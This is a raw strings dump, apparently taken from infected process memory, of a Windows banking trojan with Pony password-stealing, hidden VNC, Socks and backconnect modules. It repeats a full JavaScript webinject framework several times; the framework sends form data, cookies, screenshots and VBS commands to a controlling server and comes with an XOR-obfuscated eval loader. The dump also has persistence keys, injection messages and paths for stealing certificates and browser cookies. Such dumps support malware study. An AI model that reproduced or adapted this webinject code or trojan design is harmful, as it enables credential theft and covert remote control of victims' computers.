wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}{0AE625D1-61C9-42E5-AEF4-7154387F4248}{6B376189-11A2-4F58-96A6-001E03862004}\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}D{0AE625D1-61C9-42E5-AEF4-7154387F4248}{23DC640D-793E-4D8F-955D-2E6215F37B91}U{687F46D2-25E5-43B6-BD95-68B725074F1D}546B5A02-5978-4B96-802A-4C514A243A08
7%7.777@7
1#1-161@1|1
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
wmiprvse.exe_1468_rwx_00900000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_1624_rwx_01E30000_00055000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy.enabled.v3-1", false);user_pref("layers.acceleration.disabled", true);user_pref("gfx.direct2d.disabled", true);prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
COMDLG32.dll
WININET.DLL
O.PRF*
%XkOS
7%7.777@7
1#1-161@1|1
.pdata
@.reloc
@8.tW
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_1624_rwx_01E90000_00077000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
eval((function(_x%x){var _x%x='';var _x%x="";for (var _x%x=0;_x%x<_x%x.length;_x%x )
{_x%x =String.fromCharCode(_x%x.charCodeAt(_x%x)^(_x%x&0xFF));_x%x ;}return _x%x;})(0x%x));
function EQFramework(Key)
var %s = new function()
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');framework_key%
{this["_Key"]=Key;this["_LastAsync"]=null;this["Version"]=2;this["GetXHR"]=function(){if( typeof XMLHttpRequest==="undefined"){XMLHttpRequest=function(){try{return new ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(e){};try{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){};try{return new ActiveXObject("Microsoft.XMLHTTP")}catch(e){};return false;}};return new XMLHttpRequest();};this["Query"]=function(Method,Url,Post,Callback){var xhr=this.GetXHR();var LastAsync=null;var thisfw=this;Async=( typeof (Callback)=="undefined")?false:true;Url="/" this["_Key"] "/" Math["random"]() "/" Url;if(Async==true){this["_LastAsync"]=null;xhr["onreadystatechange"]=function(){try{if(xhr["readyState"]==4){if(xhr["status"]!=200||xhr["responseText"]=="-"){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}else {if(xhr["responseText"]==" "){thisfw["_LastAsync"]=true;if( typeof (Callback)=="function"){Callback(true)};}else {thisfw["_LastAsync"]=xhr["responseText"];if( typeof (Callback)=="function"){Callback(xhr["responseText"])};}}}}catch(e){thisfw["_LastAsync"]=false;if( typeof (Callback)=="function"){Callback(false)};}};};xhr["open"](Method,Url,Async);xhr["send"](Post);if(Async==true){return true};try{if(xhr["readyState"]==4&&xhr["status"]==200){if(xhr["responseText"]=="-"){return false}else {if(xhr["responseText"]==" "){return true}else {return xhr["responseText"]}}};return false;}catch(e){return false};};this["GetLastAsync"]=function(){return this["_LastAsync"]};this["SetVal"]=function(Name,Value,Callback){Url="1/" Name;return this.Query("POST",Url,Value,Callback);};this["GetVal"]=function(Name,Callback){Url="2/" Name;return this.Query("GET",Url,null,Callback);};this["DelVal"]=function(Name,Callback){Url="3/" Name;return this.Query("GET",Url,null,Callback);};this["ClearVals"]=function(Callback){Url="4/";return this.Query("GET",Url,null,Callback);};this["GetServer"]=function(Url,Ssl,Callback){t=(Ssl==true)?"S":"D";return this.Query("GET","5/" t "/" Url,null,Callback);};this["PostServer"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","5/" t "/" Url,Post,Callback);};this["Get"]=function(Url,Ssl,Cookie,Callback){t=(Ssl==true)?"S":"D";if( typeof (Cookie)=="undefined"||Cookie==false){Cookie=null;Type="GET";}else {Cookie="Cookie: " Cookie;Type="POST";};return this.Query(Type,"6/" t "/" Url,Cookie,Callback);};this["Post"]=function(Url,Ssl,Post,Callback){t=(Ssl==true)?"S":"D";return this.Query("POST","7/" t "/" Url,Post,Callback);};this["ScreenShot"]=function(Info,Timeout,Size,Callback){Url="8/" Timeout "/" Size "/" encodeURIComponent(Info);return this.Query("GET",Url,null,Callback);};this["LogAdd"]=function(Text,Callback){Url="9/";return this.Query("POST",Url,Text,Callback);};this["UpdateConfig"]=function(Callback){Url="10/";return this.Query("GET",Url,null,Callback);};this["StartSocks"]=function(Data,Callback){Url="11/";return this.Query("POST",Url,Data,Callback);};this["StartVnc"]=function(Data,Callback){Url="12/";return this.Query("POST",Url,Data,Callback);};this["SendForm"]=function(Link,Data,Callback){Url="13/";Post=Link "\x0D\x0A" Data;return this.Query("POST",Url,Post,Callback);};this["StartVideo"]=function(WorkTime,Callback){Url="14/" WorkTime;Data=document["location"]["href"];return this.Query("POST",Url,Data,Callback);};this["StopVideo"]=function(Callback){Url="15/";return this.Query("GET",Url,null,Callback);};this["ExecVBS"]=function(Data,Callback){Url="16/";return this.Query("POST",Url,Data,Callback);};this["Hide"]=function(Name){El=document["getElementById"](Name);El["parentNode"]["removeChild"](El);};}9L%d_
advapi32.dll
ole32.dll
shlwapi.dll
user32.dll
userenv.dll
wsock32.dll
RegCloseKey
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
